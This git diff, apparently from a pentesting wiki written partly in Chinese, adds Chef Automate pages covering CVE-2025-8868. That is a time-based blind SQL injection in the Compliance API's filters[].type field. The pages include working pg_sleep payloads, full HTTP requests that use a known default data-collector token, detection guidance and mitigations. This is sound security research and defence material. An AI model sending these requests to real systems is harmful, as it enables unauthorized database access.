diff --git a/src/pentesting-ci-cd/chef-automate-security/README.md b/src/pentesting-ci-cd/chef-automate-security/README.md new file mode 100644 index 000000000..e0a46e618 --- /dev/null +++ b/src/pentesting-ci-cd/chef-automate-security/README.md @@ -0,0 +1,18 @@ +# Chef Automate 安全 + +{{#include ../../banners/hacktricks-training.md}} + +## 什么是 Chef Automate + +Chef Automate 是一个用于基础设施自动化、合规性和应用交付的平台。它暴露一个 web UI(通常为 Angular),通过 gRPC-Gateway 与后端 gRPC services 通信,提供类似 REST 的端点,路径例如 /api/v0/。 + +- 常见的后端组件: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service +- 认证机制: user/API tokens and a data collector token header x-data-collector-token + +## Enumeration & Attacks + +{{#ref}} +chef-automate-enumeration-and-attacks.md +{{#endref}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md b/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md new file mode 100644 index 000000000..67d0593af --- /dev/null +++ b/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md @@ -0,0 +1,142 @@ +# Chef Automate Enumeration & Attacks + +{{#include ../../banners/hacktricks-training.md}} + +## Overview + +本页汇集了针对 Chef Automate 实例进行枚举和攻击的实用技术,重点包括: +- 发现 gRPC-Gateway-backed REST endpoints 并通过 validation/error responses 推断请求 schema +- 在存在默认值时滥用 x-data-collector-token 认证头 +- 在 Compliance API 中的 Time-based blind SQL injection(CVE-2025-8868),影响 /api/v0/compliance/profiles/search 中的 filters[].type 字段 + +> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services. + +## Recon: Architecture and Fingerprints + +- Front-end: Often Angular。静态 bundle 可以提示 REST 路径(例如 /api/v0/...) +- API transport: REST to gRPC via gRPC-Gateway +- Responses may include grpc-metadata-content-type: application/grpc +- Database/driver fingerprints: +- Error bodies starting with pq: 强烈提示使用 PostgreSQL 和 Go pq driver +- Interesting Compliance endpoints (auth required): +- POST /api/v0/compliance/profiles/search +- POST /api/v0/compliance/scanner/jobs/search + +## Auth: Data Collector Token (x-data-collector-token) + +Chef Automate 暴露了一个 data collector,通过专用头对请求进行认证: + +- Header: x-data-collector-token +- Risk: 某些环境可能保留默认 token,从而获得对受保护 API 路由的访问权限。已在野外观察到的已知默认值: +- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506 + +如果存在,该 token 可用于调用本应受 auth 限制的 Compliance API 端点。强化时务必尝试轮换/禁用默认值。 + +## API Schema Inference via Error-Driven Discovery + +gRPC-Gateway-backed 端点经常 leak 有用的 validation 错误,这些错误会描述期望的请求模型。 + +For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with: + +- type: string (filter field identifier) +- values: array of strings + +Example request shape: +```json +{ +"filters": [ +{ "type": "name", "values": ["test"] } +] +} +``` +格式错误的 JSON 或字段类型不正确通常会触发带有提示的 4xx/5xx 响应,且响应头会显示 gRPC-Gateway 的行为。使用这些信息映射字段并定位注入面。 + +## 合规 API SQL Injection (CVE-2025-8868) + +- 受影响的端点: POST /api/v0/compliance/profiles/search +- 注入点: filters[].type +- 漏洞类别: time-based blind SQL injection in PostgreSQL +- 根本原因: 在将 type 字段插入到动态 SQL 片段(可能用于构建 identifiers/WHERE clauses)时,缺乏正确的 parameterization/whitelisting。type 中的构造值会被 PostgreSQL 评估。 + +有效的 time-based payload: +```json +{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]} +``` +技术说明: +- 用单引号关闭原始字符串 +- 连接一个调用 pg_sleep(N) 的子查询 +- 通过 || 重新进入字符串上下文,以便无论 type 嵌入何处,最终的 SQL 都保持语法有效 + +### 通过差分延迟验证 + +发送成对请求并比较响应时间以验证服务器端执行: + +- N = 1 秒 +``` +POST /api/v0/compliance/profiles/search HTTP/1.1 +Host: +Content-Type: application/json +x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506 + +{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]} +``` +- N = 5 秒 +``` +POST /api/v0/compliance/profiles/search HTTP/1.1 +Host: +Content-Type: application/json +x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506 + +{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]} +``` +Observed behavior: +- Response times scale with pg_sleep(N) +- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths + +> Tip: 使用 timing validator(例如,多次试验并用统计比较)来减少噪声和误报。 + +### Impact + +Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry. + +### Affected versions / Fix + +- CVE: CVE-2025-8868 +- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories + +## Detection and Forensics + +- API layer: +- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep +- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows +- Database layer (PostgreSQL): +- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver) +- Authentication: +- Log and alert on usage of x-data-collector-token, especially known default values, across API paths + +## Mitigations and Hardening + +- Immediate: +- Rotate/disable default data collector tokens +- Restrict ingress to data collector endpoints; enforce strong, unique tokens +- Code-level: +- Parameterize queries; never string-concatenate SQL fragments +- Strictly whitelist allowed type values on the server (enum) +- Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists + +## Practical Testing Checklist + +- Check if x-data-collector-token is accepted and whether the known default works +- Map the Compliance API request schema by inducing validation errors and reading error messages/headers +- Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields +- Use time-based techniques with concatenation to keep SQL syntactically valid across contexts + +## References + +- [Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)](https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate) +- [Timing trace (XBOW)](https://xbow-website.pages.dev/traces/chef-automate-sql-injection/) +- [CVE-2025-8868](https://www.cve.org/CVERecord?id=CVE-2025-8868) +- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway) +- [pq PostgreSQL driver for Go](https://github.com/lib/pq) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index f056330cf..63ccf9685 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -1,5 +1,3 @@ -# GCP - Post Exploitation - -{{#include ../../../banners/hacktricks-training.md}} +# GCP - 后渗透 {{#include ../../../banners/hacktricks-training.md}}